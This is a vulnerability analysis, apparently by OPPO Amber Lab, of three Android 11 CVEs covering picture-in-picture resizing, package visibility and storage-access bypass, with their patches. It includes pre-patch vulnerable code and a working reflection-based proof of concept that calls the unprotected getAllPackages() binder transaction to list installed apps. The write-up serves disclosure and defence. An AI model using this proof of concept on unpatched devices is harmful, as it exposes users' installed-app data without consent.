How Android 11’s New Features Opened Up Three Critical Security Holes
This article examines three Android 11 security vulnerabilities—CVE‑2021‑0485’s picture‑in‑picture resizing flaw, CVE‑2021‑0521’s unprotected package‑visibility API, and CVE‑2021‑0645’s storage‑access bypass—detailing their causes, code examples, and the patches Google released to mitigate them in practice.
CVE-2021-0485
Picture‑in‑picture (PiP) is a special multi‑window mode used mainly for video playback. In Android 11, SystemUI added a PipResizeGestureHandler class that lets apps resize the PiP window, but it only enforces that the minimum width and height are greater than 0 and ignores any other constraint.
In the original AOSP code this default could not be adjusted, so an app that declares a minimal size of 1dp shrinks its PiP activity to a single pixel that the user can neither see nor control.
    import android.content.pm.ActivityInfo;
    import android.util.Size;

    // Before the patch: any minWidth/minHeight above 0 is accepted as declared,
    // so a 1dp x 1dp <layout> yields a one-pixel PiP window.
    private Size getMinimalSize(ActivityInfo activityInfo) {
        if (activityInfo == null || activityInfo.windowLayout == null) {
            return null;
        }
        final ActivityInfo.WindowLayout windowLayout = activityInfo.windowLayout;
        // -1 will be populated if an activity specifies defaultWidth/defaultHeight in <layout>
        // without minWidth/minHeight
        if (windowLayout.minWidth > 0 && windowLayout.minHeight > 0) {
            return new Size(windowLayout.minWidth, windowLayout.minHeight);
        }
        return null;
    }

Google’s patch raises the minimal size to 48dp to prevent the issue.
    <dimen name="overridable_minimal_size_pip_resizable_task">48dp</dimen>

    // mOverridableMinSize is read from the dimen above; both dimensions are clamped to at least that value.
    MinimalSize = new Size(
            Math.max(windowLayout.minWidth, mOverridableMinSize),
            Math.max(windowLayout.minHeight, mOverridableMinSize));

CVE-2021-0521
Android 11 introduced package visibility restrictions to help app stores assess privacy and security: an app must declare the QUERY_ALL_PACKAGES permission or list specific packages in <queries> elements before it can see other installed apps.
However, the PackageManager.getAllPackages() method remained unprotected. By using reflection to reach the package service binder, a malicious app can invoke this method and read the names of all installed packages without any such declaration.
    import android.os.IBinder;
    import android.os.Parcel;
    import android.util.Log;
    import java.lang.reflect.Method;
    import java.util.ArrayList;
    import java.util.List;

    private static final String TAG = "GetAllPackages";
    // Obtain the "package" service binder through the hidden ServiceManager API
    // and call the unprotected getAllPackages() transaction directly.
    static void listAllPackages() throws Exception {
        Class<?> clazz = Class.forName("android.os.ServiceManager");
        Method m = clazz.getMethod("getService", String.class);
        IBinder binder = (IBinder) m.invoke(null, "package");
        Parcel data = Parcel.obtain(), reply = Parcel.obtain();
        try {
            data.writeInterfaceToken("android.content.pm.IPackageManager");
            if (binder != null) {
                // 18 is the getAllPackages() code on the build examined here; AIDL codes vary across builds.
                boolean state = binder.transact(18, data, reply, 0);
                if (state) {
                    reply.readException(); // on patched builds this rethrows the SecurityException below
                    List<String> stringList = new ArrayList<>();
                    reply.readStringList(stringList);
                    for (String string : stringList) {
                        Log.i(TAG, "PackageName: " + string);
                    }
                }
            }
        } finally {
            data.recycle();
            reply.recycle();
        }
    }

The patch restricts ordinary apps from calling this interface; the call now fails with
java.lang.SecurityException: getAllPackages is limited to privileged callers.
CVE-2021-0645
Android 11 tightened storage permissions so that apps targeting API 30 cannot access the private directories of other apps. Developers often use the Storage Access Framework (SAF) to let users pick files, and SAF could be used to bypass these restrictions through ACTION_OPEN_DOCUMENT_TREE or ACTION_OPEN_DOCUMENT intents.
The patch adds a check in ExternalStorageProvider that blocks access to the Android/ directory on external storage.
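The patch's check is quoted next. As an added illustration, not AOSP code, the Java class below shows the property such a path guard depends on: the comparison is only as good as the path it receives, so the example canonicalises the path (empty, "." and ".." segments, trailing separators) before the case-insensitive comparison, and adds a stricter subtree variant that goes beyond the quoted exact-match check. DIRECTORY_ANDROID is re-declared locally with the framework's value so the class runs on a plain JDK.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.Locale;

/** Added example, not AOSP code: a tree-access guard modelled on the ExternalStorageProvider check. */
public class AndroidDirGuard {
    // Same value the framework uses for Environment.DIRECTORY_ANDROID.
    static final String DIRECTORY_ANDROID = "Android";

    /** Canonicalises a path relative to the storage root: drops empty and "." segments,
     *  resolves ".." without climbing above the root, and removes trailing separators. */
    static String normalize(String path) {
        Deque<String> parts = new ArrayDeque<>();
        for (String seg : path.replace('\\', '/').split("/")) {
            if (seg.isEmpty() || seg.equals(".")) continue;
            if (seg.equals("..")) { parts.pollLast(); continue; }
            parts.addLast(seg);
        }
        return String.join("/", parts);
    }

    /** The quoted check applied after normalisation: is this the Android/ directory itself?
     *  Case-insensitive, as in the patch, so the caller's spelling of the name does not matter. */
    static boolean isAndroidDirectory(String path) {
        return normalize(path).toLowerCase(Locale.ROOT)
                .equals(DIRECTORY_ANDROID.toLowerCase(Locale.ROOT));
    }

    /** Stricter variant that goes beyond the quoted check: also covers everything beneath Android/. */
    static boolean isUnderAndroidDirectory(String path) {
        String n = normalize(path).toLowerCase(Locale.ROOT);
        String a = DIRECTORY_ANDROID.toLowerCase(Locale.ROOT);
        return n.equals(a) || n.startsWith(a + "/");
    }

    public static void main(String[] args) {
        // Constructed sample paths, not taken from a device.
        String[] samples = {"Android", "android/", "./ANDROID", "Pictures/../Android",
                "Android/data/com.example.app", "Download/Android", "Androids"};
        for (String s : samples) {
            System.out.printf("%-30s exact=%-5b subtree=%b%n",
                    s, isAndroidDirectory(s), isUnderAndroidDirectory(s));
        }
    }
}
```

The first four samples all resolve to the Android/ directory and are blocked by the exact check; the fifth is caught only by the subtree variant, and the last two are unrelated paths that neither check blocks.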
    // Added to ExternalStorageProvider: a document path that names the Android/ directory
    // (compared case-insensitively) is treated as blocked.
    if (TextUtils.equals(Environment.DIRECTORY_ANDROID.toLowerCase(), path.toLowerCase())) {
        return true;
    }
    return false;

Conclusion
Each new Android release brings security restrictions that must be carefully examined. Researchers should verify that no privileged interfaces are unintentionally exposed, and assess new features against historical vulnerability data to prevent normal functionality from being abused.
OPPO Amber Lab
Centered on user data security and privacy, we conduct research and open our tech capabilities to developers, building an information‑security fortress for partners and users and safeguarding OPPO device security.